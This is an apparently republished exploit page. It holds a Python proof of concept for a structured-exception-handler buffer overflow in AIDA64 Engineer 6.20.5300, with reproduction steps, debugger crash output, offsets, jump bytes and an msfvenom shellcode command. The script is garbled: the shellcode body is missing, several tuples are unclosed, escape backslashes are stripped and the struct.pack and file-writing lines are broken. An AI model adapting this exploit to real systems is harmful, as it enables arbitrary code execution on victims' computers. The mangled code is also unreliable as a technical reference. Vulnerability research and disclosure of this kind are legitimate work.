
Published on April 2nd, 2020 📆 | 6917 Views ⚑


AIDA64 Engineer 6.20.5300 Buffer Overflow ↭


# Exploit Title: AIDA64 Engineer - 'Report File' filename Buffer Overflow (SEH)
# Date: 2020-04-02
# Exploit Author: Hodorsec
# Version: v6.20.5300
# Software Link: http://download.aida64.com/aida64engineer620.exe
# Vendor Homepage: https://www.aida64.com/products/aida64-engineer
# Tested on: Win7 x86 SP1 - Build 7601

# Description:
# - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH.

# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open AIDA64 Engineer
# - First, click on "File", "Preferences"
# - Click menu "Report", "Report File"
# - Enter a long string in the field "File name"
# - Set "File extension" to automatic, as by default
# - Click OK
# - Second, in the main menu, click "Report" which shows the "Report Wizard"
# - Next, "System Summary only", next, "Plain Text", Finish
# - Click the button "Send In E-mail"
# - Check results

# WinDBG initial crash output using only A's:
# (994.998): Access violation - code c0000005 (!!! second chance !!!)
# eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000
# eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0 nv up ei pl nz ac po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
# ntdll!RtlAcquireSRWLockShared+0x1a:
# 77f133a8 8365f400 and dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=????????

import sys,struct

filename = "aida64_engineer_poc.txt"

# Maximum length
maxlen = 5000

# Shellcode, using alphanum chars due to bytes considered to be bad above x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b 'x00x0ax0d' bufferregister=eax
# Payload size: 440 bytes
shellcode = (

# Align the registers
# ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d
align_eax = (
"x56" # PUSH ESI
"x58" # POP EAX
"x66x05x3fx10" # ADD AX,0x103f # EAX = 0x04aaffff
"x40" # INC EAX # EAX = 0x04ab0000
"x66x05x01x7F" # ADD AX,0x7f01 # EAX = 0x04ab7f01
"x66x05x6bx7c" # ADD AX,0x7c6b # EAX = 0x04abfb6c
"x50" # PUSH EAX

# Offsets
crash_ebp = 307
crash_esi = 1583
crash_seh = 319
crash_nseh = crash_seh - 4

# Variables
ascii_nop = "x47" # Doesn't do anything particular for this program
nops = ascii_nop * 32 # ASCII NOP's amount

# Prefix
prefix = "A" * crash_nseh
nseh = "x71x06x70x04" # JNO SHORT # JO SHORT # Jump over NSEH/SEH
seh = struct.pack("suffix = align_eax # Align registers to execute shellcode
suffix += nops # Some ASCII friendly NOP's
suffix += shellcode # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler

# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together

file = open(filename,"wb")
print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
print "[!] Error creating file!"

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